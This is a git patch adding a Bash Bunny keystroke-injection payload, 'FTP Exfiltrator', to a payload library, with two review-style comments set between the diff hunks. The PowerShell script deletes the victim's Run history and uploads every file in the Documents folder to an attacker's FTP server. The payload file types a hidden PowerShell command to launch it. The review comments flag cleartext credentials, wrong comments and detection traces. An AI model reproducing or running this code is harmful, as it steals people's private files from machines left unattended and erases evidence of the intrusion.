From 385a54656c4a6cad5ff8feec1f1bcbe101528f72 Mon Sep 17 00:00:00 2001
From: nutt318
Date: Fri, 7 Apr 2017 01:51:38 -0500
Subject: [PATCH] Added FTPExfiltration payload (#90)
* First commit of all documents First commit
* Fixed user document folder
* Removed unneeded line
* Edited URL to forum
---
payloads/library/ftp_exfiltrator/1.ps1 | 78 ++++++++++++++++++++
payloads/library/ftp_exfiltrator/payload.txt | 27 +++++++
payloads/library/ftp_exfiltrator/readme.md | 26 +++++++
3 files changed, 131 insertions(+)
create mode 100644 payloads/library/ftp_exfiltrator/1.ps1
create mode 100644 payloads/library/ftp_exfiltrator/payload.txt
create mode 100644 payloads/library/ftp_exfiltrator/readme.md
diff --git a/payloads/library/ftp_exfiltrator/1.ps1 b/payloads/library/ftp_exfiltrator/1.ps1
new file mode 100644
index 00000000..1c0fec26
--- /dev/null
+++ b/payloads/library/ftp_exfiltrator/1.ps1
@@ -0,0 +1,78 @@
+clear
+#Clear Run History
+remove-item "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
+
+# Credit to dkittell - https://gist.github.com/dkittell/f029b6c7d1c46ebcffcb
+# I've modified a bit of his code to create a directory with the username, I'm sure there is a better way to do this but not sure how
+
+# FTP Server Variables - edit the xxxxx
+$FTPHost = 'ftp://ftp.xxxxx.com/' + $env:username + '/'
+$FTPUser = 'xxxxx'
+$FTPPass = 'xxxxx'
+
+#Directory where to find files to upload
+$UploadFolder = "$env:userprofile\Documents\"
+
+$webclient = New-Object System.Net.WebClient
+$webclient.Credentials = New-Object System.Net.NetworkCredential($FTPUser,$FTPPass)
+
+$SrcEntries = Get-ChildItem $UploadFolder -Recurse
+$Srcfolders = $SrcEntries | Where-Object{$_.PSIsContainer}
+$SrcFiles = $SrcEntries | Where-Object{!$_.PSIsContainer}
+
+#Creates Folder with victims Username
+try {
+$makeDirectory = [System.Net.WebRequest]::Create($FTPHost);
+$makeDirectory.Credentials = New-Object System.Net.NetworkCredential($FTPUser,$FTPPass);
+$makeDirectory.Method = [System.Net.WebRequestMethods+FTP]::MakeDirectory;
+$makeDirectory.GetResponse();
+}
+catch [Net.WebException] {}
+
+# Create FTP Directory/SubDirectory If Needed - Start
+foreach($folder in $Srcfolders)
+{
+ $SrcFolderPath = $UploadFolder -replace "\\","\\" -replace "\:","\:"
+ $DesFolder = $folder.Fullname -replace $SrcFolderPath,$FTPHost
+ $DesFolder = $DesFolder -replace "\\", "/"
+ # Write-Output $DesFolder
+
+ try
+ {
+ $makeDirectory = [System.Net.WebRequest]::Create($DesFolder);
+ $makeDirectory.Credentials = New-Object System.Net.NetworkCredential($FTPUser,$FTPPass);
+ $makeDirectory.Method = [System.Net.WebRequestMethods+FTP]::MakeDirectory;
+ $makeDirectory.GetResponse();
+ #folder created successfully
+ }
+ catch [Net.WebException]
+ {
+ try {
+ #if there was an error returned, check if folder already existed on server
+ $checkDirectory = [System.Net.WebRequest]::Create($DesFolder);
+ $checkDirectory.Credentials = New-Object System.Net.NetworkCredential($FTPUser,$FTPPass);
+ $checkDirectory.Method = [System.Net.WebRequestMethods+FTP]::PrintWorkingDirectory;
+ $response = $checkDirectory.GetResponse();
+ #folder already exists!
+ }
+ catch [Net.WebException] {
+ #if the folder didn't exist
+ }
+ }
+}
+# Create FTP Directory/SubDirectory If Needed - Stop
+
+# Upload Files - Start
+foreach($entry in $SrcFiles)
+{
+ $SrcFullname = $entry.fullname
+ $SrcName = $entry.Name
+ $SrcFilePath = $UploadFolder -replace "\\","\\" -replace "\:","\:"
+ $DesFile = $SrcFullname -replace $SrcFilePath,$FTPHost
+ $DesFile = $DesFile -replace "\\", "/"
+ # Write-Output $DesFile
+
+ $uri = New-Object System.Uri($DesFile)
+ $webclient.UploadFile($uri, $SrcFullname)
+}
+# Upload Files - Stop
\ No newline at end of file
diff --git a/payloads/library/ftp_exfiltrator/payload.txt b/payloads/library/ftp_exfiltrator/payload.txt
new file mode 100644
index 00000000..eff48232
--- /dev/null
+++ b/payloads/library/ftp_exfiltrator/payload.txt
@@ -0,0 +1,27 @@
+#!/bin/bash
+#
+# Title: FTP Exfiltrator
+# Author: Nutt
+# Version: 1.0
+# Target: Windows
+#
+#Exfiltrates files from the users Documents folder
+#FTP's all files/folders to a specified FTP site named by the victim hostname.
+#Powershell FTP script will stay running after BashBunny is unplugged, once light turns green unplug and check FTP site.
+
+#Executes 1.ps1
+
+#Purple.........Setup
+#Red............Failed - Need to work on
+#Green..........Finished
+
+# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
+source bunny_helpers.sh
+
+LED R B
+ATTACKMODE HID STORAGE
+QUACK GUI r
+QUACK DELAY 1000
+QUACK STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')"
+QUACK ENTER
+LED G
\ No newline at end of file
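Review bot: `$FTPUser`/`$FTPPass` are stored in cleartext in `1.ps1` and, because `$FTPHost` is a plain `ftp://` URL, the password and every file under Documents cross the network unencrypted; nothing in the script or the readme records this. A header comment would cover it, e.g. `# NOTE: FTP credentials and file contents are sent in cleartext; the script also deletes the user's RunMRU key`. The `remove-item` on `HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` removes the user's whole Run history rather than a single entry, and the empty `catch [Net.WebException] {}` blocks swallow every FTP failure silently, so both belong in that list of host-side effects. On the detection side, what the hunk shows is a PowerShell process opening outbound FTP sessions around the time the RunMRU key disappears.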
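Review bot: The header comment in payload.txt says the FTP directory is named by the victim hostname, but `1.ps1` builds the path from `$env:username`; the comment should read `#FTP's all files/folders to a specified FTP site, into a directory named after the logged-on username.` and the same sentence in readme.md needs the same correction. `LED G` runs immediately after `QUACK ENTER`, so green only means the keystrokes were typed, not that the upload finished, and no line ever sets the red "Failed" state listed in the legend; the legend should say `#Green..........Keystrokes sent` and drop or qualify the red entry. The typed command line, `powershell -windowstyle hidden` resolving a volume labelled `BashBunny` through `gwmi win32_volume`, is what process-creation logging would record for this payload.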
diff --git a/payloads/library/ftp_exfiltrator/readme.md b/payloads/library/ftp_exfiltrator/readme.md
new file mode 100644
index 00000000..6b2416ed
--- /dev/null
+++ b/payloads/library/ftp_exfiltrator/readme.md
@@ -0,0 +1,26 @@
+# FTP Exfiltrator for Bash Bunny
+
+* Author: Nutt
+* Version: Version 1.0
+* Target: Windows
+
+## Description
+
+Exfiltrates files from the users Documents folder
+FTP's all files/folders to a specified FTP site named by the victim hostname.
+Powershell FTP script will stay running after BashBunny is unplugged, once light turns green unplug and check FTP site.
+
+## Configuration
+
+Edit 1.ps1 to specify FTP site, username and password
+
+## STATUS
+
+| LED | Status |
+| ------------------ | -------------------------------------------- |
+| Purple | Setup |
+| Red | Failed - Not working yet |
+| Green | Attack Complete |
+
+## Discussion
+[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40492-payload-ftp-exfiltrator/ "Hak5 Forum Thread")